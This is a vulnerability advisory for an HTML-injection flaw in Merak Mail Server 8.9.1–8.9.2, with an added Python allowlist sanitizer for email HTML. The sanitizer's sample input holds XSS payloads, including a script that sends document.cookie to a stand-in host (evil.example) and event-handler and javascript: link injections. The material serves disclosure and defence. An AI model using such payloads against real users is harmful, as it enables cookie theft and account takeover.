Merak Mail Server Email Message HTML Injection Vulnerability
BID:25708
Info
| Field | Value |
|---|---|
| Bugtraq ID | 25708 |
| Class | Input Validation Error |
| CVE | CVE-2007-5046 |
| Remote | Yes |
| Local | No |
| Published | Sep 18 2007 12:00AM |
| Updated | May 07 2015 05:35PM |
| Credit | MWR InfoSecurity reported this issue. |
| Vulnerable | IceWarp Merak Mail Server 8.9.2, IceWarp Merak Mail Server 8.9.1 |
| Not Vulnerable | IceWarp Merak Mail Server 9.0 |
Discussion
Merak Mail Server is prone to an HTML-injection vulnerability because the application fails to sufficiently sanitize user-supplied input before using it in dynamically generated content.
Exploiting this issue may allow an attacker to execute HTML and script code in the context of the affected site, to steal cookie-based authentication credentials, or to control how the site is rendered to the user; other attacks are also possible.
This issue affects Merak Mail Server 8.9.2 and 8.9.1; other versions may also be affected.
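The advisory describes the bug class only in general terms: message HTML supplied by a remote sender reaches the recipient's browser without sufficient sanitization. The usual server-side mitigation for a webmail front end is to rebuild each HTML body from an allowlist of tags and attributes before rendering it, dropping active content and non-http(s)/mailto link schemes. The following sanitizer is an added illustration of that pattern written for this page; it is not IceWarp's code and says nothing about how the vendor fixed 9.0. The sample message, tag allowlist and function names are constructed for the example.

```python
"""Allowlist-based sanitizer for HTML email bodies, as a webmail UI would apply
before rendering a message. Added example; not IceWarp/Merak code."""
from html import escape
from html.parser import HTMLParser

# Constructed allowlist: formatting and links only, no forms, images or scripts.
ALLOWED_TAGS = {"p", "br", "b", "i", "u", "em", "strong", "a", "ul", "ol", "li",
                "blockquote", "div", "span", "table", "tr", "td", "th"}
ALLOWED_ATTRS = {"a": {"href", "title"}}
VOID_TAGS = {"br"}
SAFE_SCHEMES = ("http://", "https://", "mailto:")
# The content of these elements is dropped entirely, not just the tags.
DROP_CONTENT_TAGS = {"script", "style", "iframe", "object", "embed"}


class EmailHtmlSanitizer(HTMLParser):
    """Re-emits only allowlisted markup; everything else becomes escaped text."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open_stack = []   # tags we emitted and still need to close
        self.skip_depth = 0    # >0 while inside a DROP_CONTENT_TAGS element

    def _safe_attr(self, tag, name, value):
        if name not in ALLOWED_ATTRS.get(tag, set()):
            return None
        if name == "href":
            # Strip whitespace/control characters so split schemes are caught.
            v = "".join(ch for ch in (value or "").lower()
                        if ch.isprintable() and not ch.isspace())
            if not v.startswith(SAFE_SCHEMES):
                return None
        return escape(value or "", quote=True)

    def handle_starttag(self, tag, attrs):
        if self.skip_depth:
            if tag in DROP_CONTENT_TAGS:
                self.skip_depth += 1
            return
        if tag in DROP_CONTENT_TAGS:
            self.skip_depth = 1
            return
        if tag not in ALLOWED_TAGS:
            return  # unknown element: drop the tag, keep its text content
        parts = [tag]
        for name, value in attrs:
            clean = self._safe_attr(tag, name, value)
            if clean is not None:
                parts.append(f'{name}="{clean}"')
        self.out.append("<" + " ".join(parts) + ">")
        if tag not in VOID_TAGS:
            self.open_stack.append(tag)

    def handle_endtag(self, tag):
        if self.skip_depth:
            if tag in DROP_CONTENT_TAGS:
                self.skip_depth -= 1
            return
        if tag in self.open_stack:
            # Close any unclosed inner tags so the output stays well-formed.
            while self.open_stack:
                t = self.open_stack.pop()
                self.out.append(f"</{t}>")
                if t == tag:
                    break

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))

    def result(self):
        while self.open_stack:
            self.out.append(f"</{self.open_stack.pop()}>")
        return "".join(self.out)


def sanitize_email_html(body):
    """Return a rendering-safe version of an untrusted HTML message body."""
    parser = EmailHtmlSanitizer()
    parser.feed(body)
    parser.close()
    return parser.result()


# Constructed sample message mixing benign markup with active content.
SAMPLE_BODY = (
    '<p>Hi, <b>invoice</b> attached.</p>'
    '<script>document.location="http://evil.example/?c="+document.cookie</script>'
    '<a href="javascript:alert(1)" onclick="alert(2)">click</a>'
    '<a href="https://example.com/x" title="ok">link</a>'
    '<img src=x onerror="alert(3)">'
    '<div>a < b &amp; c</div>'
)

if __name__ == "__main__":
    print(sanitize_email_html(SAMPLE_BODY))
```

The design choice is allowlisting rather than blocklisting: the parser never copies an element or attribute it has not been told about, so a new browser feature cannot re-open the hole. Text content is always re-escaped, and an `href` is kept only when its scheme survives normalization, which defeats scheme smuggling through embedded whitespace.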
Exploit / POC
Attackers can exploit this issue by sending a malicious email to an unsuspecting victim and enticing the victim into opening it.
Solution / Fix
Solution:
The vendor released an update to address this issue. Please contact the vendor for information on how to obtain and apply this update.
References
References:
- Merak Mail Server Homepage (IceWarp)
- Merak Webmail XSS Advisory (MWR InfoSecurity)